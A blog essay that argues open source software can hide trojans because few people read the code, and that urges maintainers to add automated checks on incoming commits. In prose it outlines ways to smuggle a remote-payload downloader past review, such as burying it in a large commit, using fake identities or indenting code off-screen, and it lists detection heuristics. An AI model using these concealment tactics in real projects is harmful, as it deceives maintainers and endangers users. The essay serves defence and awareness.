For a long time we’ve assumed that, if the software that we use is open source, we’re safe from malware. It was too difficult, and the reward was too small compared to traditional forms of distributing malware. But as open source software is gaining popularity, and more and more single-handed projects are popping up, this may not be true anymore. Today, it would in fact be feasible for an open source trojan to exist, which disguises malware inside another, seemingly innocent and presumably useful enough to be attractive, application. And why has this really become so much easier? Because users and developers alike don’t pay enough attention to the code they’re running.
Why do we assume that open source software is safe?
Let’s start with why we naturally assume that open source software is safe and free from malware:
- The code is written by a team of independent developers. If one developer tries to slip malware into a project, it’ll be caught by the other developers.
- The code is publicly available, meaning that if there was malware hidden within it someone would find it.
- If malware is hidden in some open source code and someone does find it, the code can be traced back to the developer who wrote and distributed it. Most developers don’t want to take that risk.
- The code is reviewed by the package maintainers of popular Linux distributions before they compile it to produce packages for their users. If there is any malware hidden in the code, they should find it.
Unfortunately, these all rely on one assumption: people actually read the code. There are a number of other reasons why these points don’t necessarily apply, though, so let’s look at them in turn and see how an open source trojan could actually exist.
A team doesn’t mean that there won’t be any malware
Just because there’s a team of developers doesn’t mean that there won’t be any malware. The most obvious reason is that the whole team could be working towards the goal of producing a trojaned application. How can you prove that the supposedly “independent” developers really are independent? (Even a team of 50 or 100 developers could be co-ordinated by a malware-producing organisation.)
A second, and probably more likely, scenario is that there are one or two developers in a large team who are trying to slip malware in. For this to work, the project has to be big, with a lot of developers, a lot of commits, and a lot of changes to the code in each commit. And in projects like that, it’s quite possible that the maintainers won’t read through every single commit in its entirety before accepting it. All that’s needed is for someone to commit “fixes bug #1234” with the code to fix the bug, the maintainer will compile the code, check that the bug is fixed, and accept the changes. What they didn’t notice is that, hidden in the 200-or-so lines of refactoring needed to fix the bug, were 20-or-so lines to download a remote payload and execute it.
Finally, there are a lot of projects these days with only one or two developers working on them. This has become exceptionally common in recent years. In such cases, it is obviously easy to get malware into the code, since there is no maintainer to sneak the code past.
So let’s suppose that, by one method or another, an open source project now contains malware. But surely someone will find it, right? Wrong.
Publicly-available code isn’t guaranteed to be free of malware
Again, just because other people can see the code doesn’t mean there won’t be any malware. Think about it: have you actually read the code of any open source software that you use? I’ve read a few lines of some of the smaller projects here and there, but the big ones we take for granted. Firefox is so complicated, targeting many different platforms and operating systems, that nobody in their right mind is going to read the whole thing. I hacked on LibreOffice a bit at one time, but I read only the bits I needed to understand how the particular part that I was hacking on worked – the rest didn’t matter, and was again too complicated for me to spend my time on.
What if you’re downloading the code and compiling it yourself? You might have even chosen to compile it yourself rather than getting a pre-compiled binary that you don’t trust (since, after all, you can’t guarantee that a pre-compiled binary doesn’t include malware that isn’t in the publicly-available source code). You probably say to yourself “I’m sure this is safe, I can read through all the code myself if I wanted to, nobody would want to hide malware in something I can read like that!” but again, you don’t actually read the code before you compile it. Neither did anyone else who’s compiled the same code before. So it doesn’t matter whether you get something in source or binary form, you still don’t know what’s actually hidden inside.
Theoretically, if there was malware hidden in the code, someone could eventually stumble across it. But if it’s small in comparison to the rest of the codebase (again, think of large projects here where no one single person actually knows everything that’s going on in there) and it’s hidden in a code file that people are unlikely to need to read or hack on (say, a collection of core utility functions that are written once, tested, and then mostly forgotten about) then the chances of it being found are incredibly small.
So don’t assume, just because anyone can look at the code and find malware, that anyone actually has looked at the code, or that the people who have looked at the code actually found the malware.
Open source code can be untraceable
Moving on to the third point from the list at the start of this article, you’d think this would be enough to turn off any potential malware developers. Except that open source code can be untraceable. Malware developers and other people involved in criminal activities use fake identities all the time, it would be no big deal to use a fake identity when releasing open source software. In fact, by comparison to opening a bank account, getting a job, or starting a business, contributing to open source software is hilariously easy to do under a fake identity as there is no verification performed and no cross-checking done on your claimed identity when you commit a code change. Some open source projects even prefer their developers to contribute anonymously or under fake identities (think of encryption, anonymisation, and reverse-engineering tools here, and other things which governments might be interested in putting a halt to).
Package maintainers should catch anything that’s been missed elsewhere
You might think that, if you use a Linux distribution, the package maintainers who package up the software that you download and install should offer another line of defense against malware. But you’re probably wrong again.
Just like when you compile code yourself, package maintainers for Linux distributions don’t read through all the code. They get a copy of the code, compile it, and test it. If it works, they release it. If it doesn’t work, they fiddle around with it and try to get it to work. They produce a patch from the changes they had to make to get it to work, and they keep applying the same patch to subsequent versions of the code until it’s either no longer needed or it doesn’t work anymore. Then they start again from scratch and fiddle around with it some more. But they don’t read the code, and they certainly don’t spend hours scrutinising it for malware. (If you submit the first version of something to a package repository, there will probably be more scrutinising of your code, but that’s where it ends.)
Besides, this only applies to Linux users (and those with package repositories at that). What about Windows users who install pre-compiled binaries directly from the developers?
Pre-compiled binaries may not match the source code you’re given
This one’s obvious so I won’t spend too long on it, but pre-compiled binaries that you download from the developer’s website can easily include malware that isn’t in the source code. What’s to say that the binary you’re downloading actually came from the code that you’re looking at?
Some third-party repositories, such as Ubuntu PPAs and F-Droid for open source Android apps, compile the code themselves and provide signed copies of the source code which, if you trust the repository, is verifiably guaranteed to be the source code from which the binaries were compiled. Some, particularly PPAs, do allow shared libraries in binary form to be included, which can of course contain malware (although anyone who looks at the corresponding source code would be suspicious if part of the code was distributed in binary-only form – again assuming that anyone actually looks at the code).
Why wasn’t this an issue before?
There was a time when open source software was a niche, and the developers were community-minded and technically-orientated, and the users were geeks themselves. Most open source projects, even the ones that were incredibly popular among regular users of open source software, were dwarfed by users of closed source software, even freeware (which has always been a major way of distributing trojans, which have been the focus of this discussion), and combined with the size and mindset of their userbases, the payout was too small by comparison to the amount of work that would be required and the risk that would be taken to distribute malware via open source projects. It was more viable to release freeware containing malware.
But this is no longer the case. Open source software is gaining mainstream popularity, and the very philosophies that built the open source community – trust and sharing – are making it look very attractive to malware developers. When the users trust the developers, and the developers trust each other, it becomes very easy to slip something malicious under everyone’s radar. And since open source software has a wider userbase now, and is even overtaking freeware in popularity, the payout now makes the effort required to use open source software as a malware distribution medium look worthwhile.
What can we do to protect ourselves?
Unfortunately, the only real way to protect yourself (whether you’re a user or a project maintainer) from these risks is to read the code. The whole benefit of open source software when it comes to safety and security comes from the ability for anyone to review the source code, so to make use of this benefit you have to actually read the code. This applies especially to project maintainers, who can carefully review each change to the code as it comes in, where the code is broken down into more manageable chunks. Does a commit alter any files that it shouldn’t need to? Does a commit seem particularly long for what it claims to do, like it’s trying to hide something or discourage you from reading through it? Remember these are social engineering attacks, not technical ones. Watch out for even the age-old trick of indenting a line of code off the end of the screen. Be especially sure to scrutinise commits from new developers, who haven’t contributed to a project before or who have only contributed a few times.
There are a few shortcuts that you can use to defend yourself, either as a project maintainer or as a user compiling an application from source, but unfortunately this becomes a cat-and-mouse game with malware developers, just like commercial antivirus products. Some of these could even be implemented as automated checks in a VCS.
- Does code contain any
fork()calls (or their equivalents in whatever libraries or platforms you’re using)?
- Does code call any functions to read or modify files (e.g.
open(), and so on, or their equivalents in whatever libraries or platforms you’re using)?
- Does code perform any network activity (this could be in the form of an HTTP request through a library, or a call to a system’s
- Is any of the code obfuscated? Look for short variable names and alternative encodings e.g. base 64, URL encoding, or whatever.
- Are there any binary blobs or “libraries”?
Of course, there are situations where most of would be legitimate, but they could serve as a set of automated checks in a VCS or CI system which would prompt further manual investigation if any of them flag a commit.
Unfortunately trust doesn’t work here. Even if a project, it’s maintainers, and it’s regular developers are all trustworthy, it’s still possible for a malicious developer to slip something past them. The nature of open source development is that no project can be truly trusted unless you trust every single developer that’s ever contributed to it, or you trust the maintainers to have fully double-checked everything that’s been contributed (which, unfortunately, isn’t always the case as I’ve explained).
We usually assume that open source software is safe because everyone has access to the source code, but this relies on the very big assumption that anyone reads the source code. In big projects, this is simply impractical. Maintainers have commits pouring in every day and don’t have time to review every single change, and most can’t keep track of the entire codebase of a project at any one time. Similarly, users who tout the fact that anyone can look at the source code simply wouldn’t be able to understand it all if they were to actually sit down and read it. Smaller projects are easier to get malware into, but again most people don’t read the source code, even if they compile it from source (which is often required with smaller projects that aren’t included in package repositories).
The only real defense against malware hidden in open source code is, ultimately, to read the code. Or to make sure that someone else has read the code, and you trust them to have read the code properly. However there are some automated tests that could be applied which can flag code that is more likely to be malicious. I imagine that in five years time we could see such tests being applied regularly in version control or CI systems, by repository package maintainers, and possibly even by end users who compile software from source, if people become aware of the risk.
But that isn’t to say that open source software doesn’t have many advantages. It’s still preferable to proprietary software in many ways. It can still be more secure, and that security can still be verified by auditors. It’s still a lot harder to spy on users through open source software. It’s still a lot more resilient to vendor lock-in, and the developers are still more likely to listen to the users (and if they don’t, the users are still able to fork the project and continue their own version, if they can pull enough of their own developers together).
I don’t want to discourage anyone from using or developing open source software, or make people feel scared to use it. I just want to highlight an important risk, and encourage people to avoid the assumption that open source software is inherently safe, because the truth is that in many cases the users have as much idea what’s going on inside open source software as they do with closed source software. And I especially want to encourage developers to, at the very least, implement automated checks on incoming code changes to flag them for further review. As a community of like-minded developers, we can tackle this together.